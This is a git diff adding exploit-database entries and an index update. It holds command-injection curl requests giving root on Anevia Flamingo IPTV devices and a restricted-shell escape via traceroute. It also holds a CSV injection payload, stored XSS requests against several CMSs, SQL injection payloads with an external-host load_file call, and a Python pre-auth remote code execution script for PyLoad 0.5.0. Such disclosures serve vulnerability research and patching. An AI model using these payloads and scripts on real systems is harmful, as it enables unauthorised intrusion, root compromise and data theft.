diff --git a/exploits/hardware/remote/51514.txt b/exploits/hardware/remote/51514.txt new file mode 100644 index 000000000..b16b7b679 --- /dev/null +++ b/exploits/hardware/remote/51514.txt @@ -0,0 +1,60 @@ +Exploit Title: Anevia Flamingo XS 3.6.5 - Authenticated Root Remote Code Execution +Exploit Author: LiquidWorm +Vendor: Ateme +Product web page: https://www.ateme.com +Affected version: 3.6.5 + Hardware revision: 1.1 + SoapLive 2.4.0 + SoapSystem 1.3.1 + +Summary: Flamingo XL, a new modular and high-density IPTV head-end +product for hospitality and corporate markets. Flamingo XL captures +live TV and radio content from satellite, cable, digital terrestrial +and analog sources before streaming it over IP networks to STBs, PCs +or other IP-connected devices. The Flamingo XL is based upon a modular +4U rack hardware platform that allows hospitality and corporate video +service providers to deliver a mix of channels from various sources +over internal IP networks. + +Desc: The affected device suffers from authenticated remote code +execution vulnerability. A remote attacker can exploit this issue +and execute arbitrary system commands granting her system access +with root privileges. + +Tested on: GNU/Linux 3.14.29 (x86_64) + Apache/2.2.22 (Debian) + PHP/5.6.0-0anevia2 + + +Vulnerability discovered by Gjoko 'LiquidWorm' Krstic + @zeroscience + + +Advisory ID: ZSL-2023-5778 +Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2023-5778.php + + +13.04.2023 + +-- + + +$ curl -sL "http://192.168.1.1/admin/time.php" -H "Cookie: PHPSESSID=o4pan20dtnfb239trffu06pid4" -d "ntp_hosts%5B%5D=&ntp_hosts%5B%5D=%60id%60&ntp_address=&update=Apply&request=ntp" |findstr www-data + uid=33(www-data) + + gid=33(www-data) + + groups=33(www-data),6(disk),25(floppy) + + + +--- + + +$ curl -sL "http://192.168.1.1/admin/time.php" -H "Cookie: PHPSESSID=o4pan20dtnfb239trffu06pid4" -d "ntp_hosts%5B%5D=&ntp_hosts%5B%5D=%60sudo%20id%60&ntp_address=&update=Apply&request=ntp" |findstr root + uid=0(root) + + gid=0(root) + + groups=0(root) + \ No newline at end of file diff --git a/exploits/hardware/remote/51515.txt b/exploits/hardware/remote/51515.txt new file mode 100644 index 000000000..2d16d1ef8 --- /dev/null +++ b/exploits/hardware/remote/51515.txt @@ -0,0 +1,99 @@ +Exploit Title: Anevia Flamingo XL 3.6.20 - Authenticated Root Remote Code Execution +Exploit Author: LiquidWorm +Vendor: Ateme +Product web page: https://www.ateme.com +Affected version: 3.6.20, 3.2.9 + Hardware revision 1.1, 1.0 + SoapLive 2.4.1, 2.0.3 + SoapSystem 1.3.1 + +Summary: Flamingo XL, a new modular and high-density IPTV head-end +product for hospitality and corporate markets. Flamingo XL captures +live TV and radio content from satellite, cable, digital terrestrial +and analog sources before streaming it over IP networks to STBs, PCs +or other IP-connected devices. The Flamingo XL is based upon a modular +4U rack hardware platform that allows hospitality and corporate video +service providers to deliver a mix of channels from various sources +over internal IP networks. + +Desc: The affected device suffers from authenticated remote code +execution vulnerability. A remote attacker can exploit this issue +and execute arbitrary system commands granting her system access +with root privileges. + +Tested on: GNU/Linux 3.1.4 (x86_64) + Apache/2.2.15 (Unix) + mod_ssl/2.2.15 + OpenSSL/0.9.8g + DAV/2 + PHP/5.3.6 + + +Vulnerability discovered by Gjoko 'LiquidWorm' Krstic + @zeroscience + + +Advisory ID: ZSL-2023-5779 +Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2023-5779.php + + +13.04.2023 + +-- + + +> curl -vL http://192.168.1.1/admin/time.php -H "Cookie: PHPSESSID=i3nu7de9vv0q9pi4a8eg8v71b4" -d "ntp=`id`&request=ntp&update=Sync" |findstr root + % Total % Received % Xferd Average Speed Time Time Time Current + Dload Upload Total Spent Left Speed + 0 0 0 0 0 0 0 0 --:--:-- --:--:-- --:--:-- 0* Trying 192.168.1.1:80... +* Connected to 192.168.1.1 (192.168.1.1) port 80 (#0) +> POST /admin/time.php HTTP/1.1 +> Host: 192.168.1.1 +> User-Agent: curl/8.0.1 +> Accept: */* +> Cookie: PHPSESSID=i3nu7de9vv0q9pi4a8eg8v71b4 +> Content-Length: 32 +> Content-Type: application/x-www-form-urlencoded +> +} [32 bytes data] +100 32 0 0 100 32 0 25 0:00:01 0:00:01 --:--:-- 25< HTTP/1.1 302 Found +< Date: Thu, 13 Apr 2023 23:54:15 GMT +< Server: Apache/2.2.15 (Unix) mod_ssl/2.2.15 OpenSSL/0.9.8g DAV/2 PHP/5.3.6 +< X-Powered-By: PHP/5.3.6 +< Expires: Thu, 19 Nov 1981 08:52:00 GMT +< Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 +< Pragma: no-cache +* Please rewind output before next send +< Location: /admin/time.php +< Transfer-Encoding: chunked +< Content-Type: text/html +< +* Ignoring the response-body +{ [5 bytes data] +100 32 0 0 100 32 0 19 0:00:01 0:00:01 --:--:-- 19 +* Connection #0 to host 192.168.1.1 left intact +* Issue another request to this URL: 'http://192.168.1.1/admin/time.php' +* Switch from POST to GET +* Found bundle for host: 0x1de6c6321b0 [serially] +* Re-using existing connection #0 with host 192.168.1.1 +> POST /admin/time.php HTTP/1.1 +> Host: 192.168.1.1 +> User-Agent: curl/8.0.1 +> Accept: */* +> Cookie: PHPSESSID=i3nu7de9vv0q9pi4a8eg8v71b4 +> +< HTTP/1.1 200 OK +< Date: Thu, 13 Apr 2023 23:54:17 GMT +< Server: Apache/2.2.15 (Unix) mod_ssl/2.2.15 OpenSSL/0.9.8g DAV/2 PHP/5.3.6 +< X-Powered-By: PHP/5.3.6 +< Expires: Thu, 19 Nov 1981 08:52:00 GMT +< Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 +< Pragma: no-cache +< Transfer-Encoding: chunked +< Content-Type: text/html +< +{ [13853 bytes data] +14 Apr 03:54:17 ntpdate[8964]: can't find host uid=0(root)
<----------------------<< +14 Apr 03:54:17 ntpdate[8964]: can't find host gid=0(root)
<----------------------<< +100 33896 0 33896 0 0 14891 0 --:--:-- 0:00:02 --:--:-- 99k +* Connection #0 to host 192.168.1.1 left intact \ No newline at end of file diff --git a/exploits/hardware/remote/51516.txt b/exploits/hardware/remote/51516.txt new file mode 100644 index 000000000..6954dc68c --- /dev/null +++ b/exploits/hardware/remote/51516.txt @@ -0,0 +1,198 @@ +Exploit Title: Anevia Flamingo XL 3.2.9 - Remote Root Jailbreak +Exploit Author: LiquidWorm +Product web page: https://www.ateme.com +Affected version: 3.2.9 + Hardware revision 1.0 + SoapLive 2.0.3 + +Summary: Flamingo XL, a new modular and high-density IPTV head-end +product for hospitality and corporate markets. Flamingo XL captures +live TV and radio content from satellite, cable, digital terrestrial +and analog sources before streaming it over IP networks to STBs, PCs +or other IP-connected devices. The Flamingo XL is based upon a modular +4U rack hardware platform that allows hospitality and corporate video +service providers to deliver a mix of channels from various sources +over internal IP networks. + +Desc: Once the admin establishes a secure shell session, she gets +dropped into a sandboxed environment using the login binary that +allows specific set of commands. One of those commands that can be +exploited to escape the jailed shell is traceroute. A remote attacker +can breakout of the restricted environment and have full root access +to the device. + +Tested on: GNU/Linux 3.1.4 (x86_64) + Apache/2.2.15 (Unix) + mod_ssl/2.2.15 + OpenSSL/0.9.8g + DAV/2 + PHP/5.3.6 + + +Vulnerability discovered by Gjoko 'LiquidWorm' Krstic + @zeroscience + + +Advisory ID: ZSL-2023-5780 +Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2023-5780.php + + +13.04.2023 + +-- + + +$ ssh -o KexAlgorithms=+diffie-hellman-group1-sha1 root@192.168.1.1 +The authenticity of host '192.168.1.1 (192.168.1.1)' can't be established. +RSA key fingerprint is SHA256:E6TaDYkszZMbS555THYEPVzv1DpzYrwJzW1TM4+ZSLk. +Are you sure you want to continue connecting (yes/no/[fingerprint])? yes +Warning: Permanently added '192.168.1.1' (RSA) to the list of known hosts. +Anevia Flamingo XL +root@192.168.1.1's password: +Primary-XL> help +available commands: + bonding + config + date + dns + enable + ethconfig + exit + exp + firewall + help + hostname + http + igmpq + imp + ipconfig + license + log + mail + passwd + persistent_logs + ping + reboot + reset + route + serial + settings + sslconfig + tcpdump + timezone + traceroute + upgrade + uptime + version + vlanconfig + +Primary-XL> tcpdump ;id +tcpdump: illegal token: ; +Primary-XL> id +unknown command id +Primary-XL> whoami +unknown command whoami +Primary-XL> ping ;id +ping: ;id: Host name lookup failure +Primary-XL> traceroute ;id +BusyBox v1.1.2p2 (2012.04.24-09:33+0000) multi-call binary + +Usage: traceroute [-FIldnrv] [-f 1st_ttl] [-m max_ttl] [-p port#] [-q nqueries] + [-s src_addr] [-t tos] [-w wait] [-g gateway] [-i iface] + [-z pausemsecs] host [data size] + +trace the route ip packets follow going to "host" +Options: + -F Set the don't fragment bit + -I Use ICMP ECHO instead of UDP datagrams + -l Display the ttl value of the returned packet + -d Set SO_DEBUG options to socket + -n Print hop addresses numerically rather than symbolically + -r Bypass the normal routing tables and send directly to a host + -v Verbose output + -m max_ttl Set the max time-to-live (max number of hops) + -p port# Set the base UDP port number used in probes + (default is 33434) + -q nqueries Set the number of probes per ``ttl'' to nqueries + (default is 3) + -s src_addr Use the following IP address as the source address + -t tos Set the type-of-service in probe packets to the following value + (default 0) + -w wait Set the time (in seconds) to wait for a response to a probe + (default 3 sec) + -g Specify a loose source route gateway (8 maximum) + +uid=0(root) gid=0(root) groups=0(root) +Primary-XL> version +Software Revision: Anevia Flamingo XL v3.2.9 +Hardware Revision: 1.0 +(c) Anevia 2003-2012 +Primary-XL> traceroute ;sh +... +... +whoami +root +id +uid=0(root) gid=0(root) groups=0(root) +ls -al +drwxr-xr-x 19 root root 1024 Oct 3 2022 . +drwxr-xr-x 19 root root 1024 Oct 3 2022 .. +drwxr-xr-x 2 root root 1024 Oct 21 2013 bin +drwxrwxrwt 2 root root 40 Oct 3 2022 cores +drwxr-xr-x 13 root root 27648 May 22 00:53 dev +drwxr-xr-x 3 root root 1024 Oct 21 2013 emul +drwxr-xr-x 48 1000 1000 3072 Oct 3 2022 etc +drwxr-xr-x 3 root root 1024 Oct 3 2022 home +drwxr-xr-x 11 root root 3072 Oct 21 2013 lib +lrwxrwxrwx 1 root root 20 Oct 21 2013 lib32 -> /emul/ia32-linux/lib +lrwxrwxrwx 1 root root 3 Oct 21 2013 lib64 -> lib +drwx------ 2 root root 12288 Oct 21 2013 lost+found +drwxr-xr-x 4 root root 1024 Oct 21 2013 mnt +drwxrwxrwt 2 root root 80 May 22 00:45 php_sessions +dr-xr-xr-x 177 root root 0 Oct 3 2022 proc +drwxr-xr-x 4 root root 1024 Oct 21 2013 root +drwxr-xr-x 2 root root 2048 Oct 21 2013 sbin +drwxr-xr-x 12 root root 0 Oct 3 2022 sys +drwxrwxrwt 26 root root 1140 May 22 01:06 tmp +drwxr-xr-x 10 1000 1000 1024 Oct 21 2013 usr +drwxr-xr-x 14 root root 1024 Oct 21 2013 var + +ls /var/www/admin +_img configuration.php log_securemedia.php stream_dump.php +_lang cores_and_logs_management.php login.php stream_services +_lib dataminer_handshake.php logout.php streaming.php +_style dvbt.php logs.php support.php +about.php dvbt_scan.php main.php template +ajax export.php manager.php time.php +alarm.php fileprogress.php network.php toto.ts +alarm_view.php firewall.php pear upload_helper.php +authentication.php get_config power.php uptime.php +bridges.php get_enquiry_pending.php read_settings.php usbloader.php +cam.php get_upgrade_error.php receive_helper.php version.php +channel.php heartbeat.php rescrambling webradio.php +channel_xl_list.php include rescrambling.php webtv +check_state input.php resilience webtv.php +class js resilience.php xmltv.php +common license.php restart_service.php +config_snmp.php log.php set_oem.php + +python -c 'import pty; pty.spawn("/bin/bash")' +root@Primary-XL:/# cd /usr/local/bin +root@Primary-XL:/usr/local/bin# ls -al login +-rwxr-xr-x 1 root root 35896 Feb 21 2012 login +root@Primary-XL:/usr/local/bin# cd .. +root@Primary-XL:/usr/local# ls commands/ +bonding firewall mail timezone +config help passwd traceroute +date hostname persistent_logs upgrade +dbg-serial http ping uptime +dbg-set-oem igmpq route version +dbg-updates-log imp serial vlanconfig +dns ipconfig settings +ethconfig license sslconfig +exp log tcpdump +root@Primary-XL:/usr/local# exit +exit +Primary-XL> enable +password: +Primary-XL# ;] \ No newline at end of file diff --git a/exploits/php/webapps/51517.txt b/exploits/php/webapps/51517.txt new file mode 100644 index 000000000..da53e17d2 --- /dev/null +++ b/exploits/php/webapps/51517.txt @@ -0,0 +1,19 @@ +Exploit Title: projectSend r1605 - CSV injection +Version: r1605 +Bugs: CSV Injection +Technology: PHP +Vendor URL: https://www.projectsend.org/ +Software Link: https://www.projectsend.org/ +Date of found: 11-06-2023 +Author: Mirabbas Ağalarov +Tested on: Windows + + +2. Technical Details & POC +======================================== +Step 1. login as user +step 2. Go to My Account ( http://localhost/users-edit.php?id=2 ) +step 3. Set name as =calc|a!z| +step 3. If admin Export action-log as CSV file ,in The computer of admin occurs csv injection and will open calculator ( http://localhost/actions-log.php ) + +payload: =calc|a!z| \ No newline at end of file diff --git a/exploits/php/webapps/51518.txt b/exploits/php/webapps/51518.txt new file mode 100644 index 000000000..43288613b --- /dev/null +++ b/exploits/php/webapps/51518.txt @@ -0,0 +1,46 @@ +Exploit Title: projectSend r1605 - Stored XSS +Application: projectSend +Version: r1605 +Bugs: Stored Xss +Technology: PHP +Vendor URL: https://www.projectsend.org/ +Software Link: https://www.projectsend.org/ +Date of found: 11-06-2023 +Author: Mirabbas Ağalarov +Tested on: Linux + +2. Technical Details & POC +======================================== + +1. Login as admin +2. Go to Custom Html/Css/Js (http://localhost/custom-assets.php) +3. Go to new JS (http://localhost/custom-assets-add.php?language=js) +4. Set content as alert("xss"); and set public +5. And Save +6. Go to http://localhost (logout) + +payload: alert("xss") + +POST /custom-assets-add.php HTTP/1.1 +Host: localhost +Content-Length: 171 +Cache-Control: max-age=0 +sec-ch-ua: "Chromium";v="113", "Not-A.Brand";v="24" +sec-ch-ua-mobile: ?0 +sec-ch-ua-platform: "Linux" +Upgrade-Insecure-Requests: 1 +Origin: http://localhost +Content-Type: application/x-www-form-urlencoded +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/113.0.5672.127 Safari/537.36 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 +Sec-Fetch-Site: same-origin +Sec-Fetch-Mode: navigate +Sec-Fetch-User: ?1 +Sec-Fetch-Dest: document +Referer: http://localhost/custom-assets-add.php?language=js +Accept-Encoding: gzip, deflate +Accept-Language: en-US,en;q=0.9 +Cookie: log_download_started=false; PHPSESSID=7j8g8u9t7khb259ci4fvareg2l +Connection: close + +csrf_token=222b49c5c4a1755c451637f17ef3e7ea8bb5b6ee616293bd73d15d0e608d9dab&language=js&title=test&content=alert%28%22XSS%22%29%3B&enabled=on&location=public&position=head \ No newline at end of file diff --git a/exploits/php/webapps/51519.txt b/exploits/php/webapps/51519.txt new file mode 100644 index 000000000..3837a6c20 --- /dev/null +++ b/exploits/php/webapps/51519.txt @@ -0,0 +1,17 @@ +# Exploit Title: Monstra 3.0.4 - Stored Cross-Site Scripting (XSS) +# Date: 2023-06-13 +# Exploit Author: tmrswrr +# Vendor Homepage: https://monstra.org/ +# Software Link: https://monstra.org/monstra-3.0.4.zip +# Version: 3.0.4 +# Tested : https://www.softaculous.com/softaculous/demos/Monstra + + +--- Description --- + +1) Login admin panel and go to Pages: +https://demos3.softaculous.com/Monstraggybvrnbr4/admin/index.php?id=pages +2) Click edit button and write your payload in the Name field: +Payload: "> +3) After save change and will you see alert button +https://demos3.softaculous.com/Monstraggybvrnbr4/ \ No newline at end of file diff --git a/exploits/php/webapps/51520.txt b/exploits/php/webapps/51520.txt new file mode 100644 index 000000000..9c41abcfa --- /dev/null +++ b/exploits/php/webapps/51520.txt @@ -0,0 +1,17 @@ +# Exploit Title: Xoops CMS 2.5.10 - Stored Cross-Site Scripting (XSS) (Authenticated) +# Date: 2023-06-12 +# Exploit Author: tmrswrr +# Vendor Homepage: https://xoops.org/ +# Software https://github.com/XOOPS/XoopsCore25/releases/tag/v2.5.10 +# Version: 2.5.10 +# Tested : https://www.softaculous.com/apps/cms/Xoops + + +--- Description --- + +1) Login admin panel and click Image Manager , choose Add Category : +https://demos5.softaculous.com/Xoopshkqdowiwqq/modules/system/admin.php?fct=images +2) Write your payload in the Category Name field and submit: +Payload: +3) After click multiupload , when you move the mouse to the payload name, you will see the alert button +https://demos5.softaculous.com/Xoopshkqdowiwqq/modules/system/admin.php?fct=images&op=multiupload&imgcat_id=2 \ No newline at end of file diff --git a/exploits/php/webapps/51521.txt b/exploits/php/webapps/51521.txt new file mode 100644 index 000000000..e8fd0c7c5 --- /dev/null +++ b/exploits/php/webapps/51521.txt @@ -0,0 +1,79 @@ +## Exploit Title: Online Thesis Archiving System v1.0 - Multiple-SQLi +## Author: nu11secur1ty +## Date: 06.12.2023 +## Vendor: https://github.com/oretnom23 +## Software: https://www.sourcecodester.com/php/15083/online-thesis-archiving-system-using-phpoop-free-source-code.html +## Reference: https://portswigger.net/web-security/sql-injection + +## Description: +The password parameter appears to be vulnerable to SQL injection +attacks. The payload '+(select +load_file('\\\\t5z7nwb485tiyvqzqnv3hp1z3q9jxatyk18tvkj9.tupungerispanski.com\\ock'))+' +was submitted in the password parameter. +This payload injects a SQL sub-query that calls MySQL's load_file +function with a UNC file path that references a URL on an external +domain. The application interacted with that domain, indicating that +the injected SQL query was executed. The attacker can dump all +information from the +database of this system, and then he can use it for dangerous and +malicious purposes! + +STATUS: HIGH-CRITICAL Vulnerability + +[+]Payload: +```mysql +--- +Parameter: password (POST) + Type: boolean-based blind + Title: OR boolean-based blind - WHERE or HAVING clause (NOT) + Payload: email=itvBGDRM@burpcollaborator.net&password=v7K!u1n!T7') +OR NOT 1404=1404-- Eotr + + Type: error-based + Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or +GROUP BY clause (FLOOR) + Payload: email=itvBGDRM@burpcollaborator.net&password=v7K!u1n!T7') +AND (SELECT 5476 FROM(SELECT COUNT(*),CONCAT(0x717a6b6b71,(SELECT +(ELT(5476=5476,1))),0x71766a7a71,FLOOR(RAND(0)*2))x FROM +INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- sOUa + + Type: time-based blind + Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP) + Payload: email=itvBGDRM@burpcollaborator.net&password=v7K!u1n!T7') +AND (SELECT 6301 FROM (SELECT(SLEEP(15)))MFgI)-- HCqY +--- + +``` + +## Reproduce: +[href](https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/oretnom23/2023/OTAS-v1.0) + +## Proof and Exploit: +[href](https://www.nu11secur1ty.com/2023/06/otas-php-by-oretnom23-v10-multiple-sqli.html) + +## Time spend: +01:15:00 + + +-- +System Administrator - Infrastructure Engineer +Penetration Testing Engineer +Exploit developer at https://packetstormsecurity.com/ +https://cve.mitre.org/index.htmlhttps://cxsecurity.com/ and +https://www.exploit-db.com/ +0day Exploit DataBase https://0day.today/ +home page: https://www.nu11secur1ty.com/ +hiPEnIMR0v7QCo/+SEH9gBclAAYWGnPoBIQ75sCj60E= + nu11secur1ty + + +-- +System Administrator - Infrastructure Engineer +Penetration Testing Engineer +Exploit developer at https://packetstormsecurity.com/ +https://cve.mitre.org/index.html +https://cxsecurity.com/ and https://www.exploit-db.com/ +0day Exploit DataBase https://0day.today/ +home page: https://www.nu11secur1ty.com/ +hiPEnIMR0v7QCo/+SEH9gBclAAYWGnPoBIQ75sCj60E= + nu11secur1ty \ No newline at end of file diff --git a/exploits/php/webapps/51523.txt b/exploits/php/webapps/51523.txt new file mode 100644 index 000000000..088ea7e6e --- /dev/null +++ b/exploits/php/webapps/51523.txt @@ -0,0 +1,196 @@ +# Exploit Title: Textpattern CMS v4.8.8 - Stored Cross-Site Scripting (XSS) (Authenticated) +# Date: 2023-06-13 +# Exploit Author: tmrswrr +# Vendor Homepage: https://textpattern.com/ +# Software Link: https://textpattern.com/file_download/118/textpattern-4.8.8.zip +# Version: v4.8.8 +# Tested : https://release-demo.textpattern.co/ + + +--- Description --- + + +1) Login admin page , choose Content , Articles section : +https://release-demo.textpattern.co/textpattern/index.php?event=article&ID=2 +2) Write in Excerpt field this payload > "> +3) Click My Site will you see alert button +https://release-demo.textpattern.co/index.php?id=2 + + +--- Request --- + +POST /textpattern/index.php HTTP/2 +Host: release-demo.textpattern.co +Cookie: txp_login=managing-editor179%2C1673c724813dc43d06d90aff6e69616c; txp_login_public=b7cb169562managing-editor179 +User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0 +Accept: text/javascript, application/javascript, application/ecmascript, application/x-ecmascript, */*; q=0.01 +Accept-Language: en-US,en;q=0.5 +Accept-Encoding: gzip, deflate +Referer: https://release-demo.textpattern.co/ +X-Requested-With: XMLHttpRequest +Content-Type: multipart/form-data; boundary=---------------------------26516646042700398511941284351 +Content-Length: 4690 +Origin: https://release-demo.textpattern.co +Dnt: 1 +Sec-Fetch-Dest: empty +Sec-Fetch-Mode: cors +Sec-Fetch-Site: same-origin +Te: trailers + +-----------------------------26516646042700398511941284351 +Content-Disposition: form-data; name="ID" + +2 +-----------------------------26516646042700398511941284351 +Content-Disposition: form-data; name="event" + +article +-----------------------------26516646042700398511941284351 +Content-Disposition: form-data; name="step" + +edit +-----------------------------26516646042700398511941284351 +Content-Disposition: form-data; name="Title" + +hello +-----------------------------26516646042700398511941284351 +Content-Disposition: form-data; name="textile_body" + +1 +-----------------------------26516646042700398511941284351 +Content-Disposition: form-data; name="Body" + +hello +-----------------------------26516646042700398511941284351 +Content-Disposition: form-data; name="textile_excerpt" + +1 +-----------------------------26516646042700398511941284351 +Content-Disposition: form-data; name="Excerpt" + +"> +-----------------------------26516646042700398511941284351 +Content-Disposition: form-data; name="sPosted" + +1686684925 +-----------------------------26516646042700398511941284351 +Content-Disposition: form-data; name="sLastMod" + +1686685069 +-----------------------------26516646042700398511941284351 +Content-Disposition: form-data; name="AuthorID" + +managing-editor179 +-----------------------------26516646042700398511941284351 +Content-Disposition: form-data; name="LastModID" + +managing-editor179 +-----------------------------26516646042700398511941284351 +Content-Disposition: form-data; name="Status" + +4 +-----------------------------26516646042700398511941284351 +Content-Disposition: form-data; name="Section" + +articles +-----------------------------26516646042700398511941284351 +Content-Disposition: form-data; name="override_form" + +article_listing +-----------------------------26516646042700398511941284351 +Content-Disposition: form-data; name="year" + +2023 +-----------------------------26516646042700398511941284351 +Content-Disposition: form-data; name="month" + +06 +-----------------------------26516646042700398511941284351 +Content-Disposition: form-data; name="day" + +13 +-----------------------------26516646042700398511941284351 +Content-Disposition: form-data; name="hour" + +19 +-----------------------------26516646042700398511941284351 +Content-Disposition: form-data; name="minute" + +35 +-----------------------------26516646042700398511941284351 +Content-Disposition: form-data; name="second" + +25 +-----------------------------26516646042700398511941284351 +Content-Disposition: form-data; name="exp_year" + + +-----------------------------26516646042700398511941284351 +Content-Disposition: form-data; name="exp_month" + + +-----------------------------26516646042700398511941284351 +Content-Disposition: form-data; name="exp_day" + + +-----------------------------26516646042700398511941284351 +Content-Disposition: form-data; name="exp_hour" + + +-----------------------------26516646042700398511941284351 +Content-Disposition: form-data; name="exp_minute" + + +-----------------------------26516646042700398511941284351 +Content-Disposition: form-data; name="exp_second" + + +-----------------------------26516646042700398511941284351 +Content-Disposition: form-data; name="sExpires" + + +-----------------------------26516646042700398511941284351 +Content-Disposition: form-data; name="Category1" + +hope-for-the-future +-----------------------------26516646042700398511941284351 +Content-Disposition: form-data; name="Category2" + +hope-for-the-future +-----------------------------26516646042700398511941284351 +Content-Disposition: form-data; name="url_title" + +alert1 +-----------------------------26516646042700398511941284351 +Content-Disposition: form-data; name="description" + + +-----------------------------26516646042700398511941284351 +Content-Disposition: form-data; name="Keywords" + + +-----------------------------26516646042700398511941284351 +Content-Disposition: form-data; name="Image" + + +-----------------------------26516646042700398511941284351 +Content-Disposition: form-data; name="custom_1" + + +-----------------------------26516646042700398511941284351 +Content-Disposition: form-data; name="custom_2" + + +-----------------------------26516646042700398511941284351 +Content-Disposition: form-data; name="save" + +Save +-----------------------------26516646042700398511941284351 +Content-Disposition: form-data; name="app_mode" + +async +-----------------------------26516646042700398511941284351 +Content-Disposition: form-data; name="_txp_token" + +fb6da7f582d0606882462bc4ed72238e +-----------------------------26516646042700398511941284351-- \ No newline at end of file diff --git a/exploits/python/webapps/51522.py b/exploits/python/webapps/51522.py new file mode 100755 index 000000000..3eaa77f04 --- /dev/null +++ b/exploits/python/webapps/51522.py @@ -0,0 +1,53 @@ +# Exploit Title: PyLoad 0.5.0 - Pre-auth Remote Code Execution (RCE) +# Date: 06-10-2023 +# Credits: bAu @bauh0lz +# Exploit Author: Gabriel Lima (0xGabe) +# Vendor Homepage: https://pyload.net/ +# Software Link: https://github.com/pyload/pyload +# Version: 0.5.0 +# Tested on: Ubuntu 20.04.6 +# CVE: CVE-2023-0297 + +import requests, argparse + +parser = argparse.ArgumentParser() +parser.add_argument('-u', action='store', dest='url', required=True, help='Target url.') +parser.add_argument('-c', action='store', dest='cmd', required=True, help='Command to execute.') +arguments = parser.parse_args() + +def doRequest(url): + try: + res = requests.get(url) + if res.status_code == 200: + return True + else: + return False + + except requests.exceptions.RequestException as e: + print("[!] Maybe the host is offline :", e) + exit() + +def runExploit(url, cmd): + endpoint = url + '/flash/addcrypted2' + if " " in cmd: + validCommand = cmd.replace(" ", "%20") + else: + validCommand = cmd + + payload = 'jk=pyimport%20os;os.system("'+validCommand+'");f=function%20f2(){};&package=xxx&crypted=AAAA&&passwords=aaaa' + test = requests.post(endpoint, headers={'Content-type': 'application/x-www-form-urlencoded'},data=payload) + print('[+] The exploit has be executeded in target machine. ') + +def main(targetUrl, Command): + print('[+] Check if target host is alive: ' + targetUrl) + alive = doRequest(targetUrl) + if alive == True: + print("[+] Host up, let's exploit! ") + runExploit(targetUrl,Command) + else: + print('[-] Host down! ') + +if(arguments.url != None and arguments.cmd != None): + targetUrl = arguments.url + Command = arguments.cmd + main(targetUrl, Command) \ No newline at end of file diff --git a/files_exploits.csv b/files_exploits.csv index 1eedeac46..992faea35 100644 --- a/files_exploits.csv +++ b/files_exploits.csv @@ -3311,6 +3311,9 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd 23855,exploits/hardware/remote/23855.txt,"Allied Telesis AT-MCF2000M 3.0.2 - Remote Command Execution",2013-01-03,dun,remote,hardware,,2013-01-03,2016-12-04,0,OSVDB-88921,,,,, 21243,exploits/hardware/remote/21243.pl,"Alteon AceDirector - Half-Closed HTTP Request IP Address Revealing",2001-12-20,"Dave Plonka",remote,hardware,,2001-12-20,2012-09-11,1,CVE-2002-0209;OSVDB-3964,,,,,https://www.securityfocus.com/bid/3964/info 31519,exploits/hardware/remote/31519.rb,"Android Browser and WebView addJavascriptInterface - Code Execution (Metasploit)",2014-02-07,Metasploit,remote,hardware,,2014-02-07,2014-02-07,1,CVE-2013-4710;OSVDB-97520,"Metasploit Framework (MSF)",,,,https://labs.mwrinfosecurity.com/advisories/2013/09/24/webview +51516,exploits/hardware/remote/51516.txt,"Anevia Flamingo XL 3.2.9 - Remote Root Jailbreak",2023-06-14,LiquidWorm,remote,hardware,,2023-06-14,2023-06-14,0,,,,,, +51515,exploits/hardware/remote/51515.txt,"Anevia Flamingo XL 3.6.20 - Authenticated Root Remote Code Execution",2023-06-14,LiquidWorm,remote,hardware,,2023-06-14,2023-06-14,0,,,,,, +51514,exploits/hardware/remote/51514.txt,"Anevia Flamingo XS 3.6.5 - Authenticated Root Remote Code Execution",2023-06-14,LiquidWorm,remote,hardware,,2023-06-14,2023-06-14,0,,,,,, 33044,exploits/hardware/remote/33044.html,"Apple iPhone 2.2.1 - Call Approval Dialog Security Bypass (1)",2009-05-17,"Collin Mulliner",remote,hardware,,2009-05-17,2014-04-27,1,CVE-2009-0961;OSVDB-55238,,,,,https://www.securityfocus.com/bid/35425/info 33045,exploits/hardware/remote/33045.html,"Apple iPhone 2.2.1 - Call Approval Dialog Security Bypass (2)",2009-05-17,"Collin Mulliner",remote,hardware,,2009-05-17,2014-04-27,1,CVE-2009-0961;OSVDB-55238,,,,,https://www.securityfocus.com/bid/35425/info 33046,exploits/hardware/remote/33046.html,"Apple iPhone 2.2.1 - Call Approval Dialog Security Bypass (3)",2009-05-17,"Collin Mulliner",remote,hardware,,2009-05-17,2014-04-27,1,CVE-2009-0961;OSVDB-55238,,,,,https://www.securityfocus.com/bid/35425/info @@ -23467,6 +23470,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd 38148,exploits/php/webapps/38148.txt,"Monsta FTP 1.6.2 - Multiple Vulnerabilities",2015-09-11,hyp3rlinx,webapps,php,80,2015-09-11,2015-09-11,0,OSVDB-127474;OSVDB-127473,,,,http://www.exploit-db.comMonsta-FTP-master.zip, 27660,exploits/php/webapps/27660.txt,"Monster Top List 1.4 - 'functions.php' Remote File Inclusion",2006-04-17,r0t,webapps,php,,2006-04-17,2013-08-18,1,CVE-2006-1781;OSVDB-24650,,,,,https://www.securityfocus.com/bid/17546/info 3530,exploits/php/webapps/3530.pl,"Monster Top List 1.4.2 - 'functions.php?root_path' Remote File Inclusion",2007-03-20,fluffy_bunny,webapps,php,,2007-03-19,2016-09-29,1,CVE-2006-1781,,,,, +51519,exploits/php/webapps/51519.txt,"Monstra 3.0.4 - Stored Cross-Site Scripting (XSS)",2023-06-14,tmrswrr,webapps,php,,2023-06-14,2023-06-14,0,,,,,, 38769,exploits/php/webapps/38769.txt,"Monstra CMS 1.2.0 - 'login' SQL 